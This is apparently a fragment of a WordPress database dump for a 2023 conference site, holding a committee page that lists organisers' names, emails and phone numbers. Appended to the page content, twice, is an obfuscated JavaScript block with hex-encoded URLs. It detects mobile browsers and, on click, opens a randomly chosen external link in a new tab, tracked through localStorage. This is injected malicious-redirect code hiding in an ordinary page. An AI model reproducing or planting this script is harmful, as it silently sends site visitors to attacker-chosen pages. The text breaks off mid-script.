_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:15:33','2023-06-27 10:15:33','',4849,'https://gsw2023.com/?p=4898',0,'revision','',0),
(4899,4,'2023-06-27 10:21:47','2023-06-27 10:21:47','','nagy','','inherit','open','closed','','nagy','','','2023-06-27 10:21:47','2023-06-27 10:21:47','',4849,'https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg',0,'attachment','image/jpeg',0),
(4900,4,'2023-06-27 10:23:55','2023-06-27 10:23:55','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Local Web director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span>\r\n<span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span>\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span>\r\n<span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span>\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 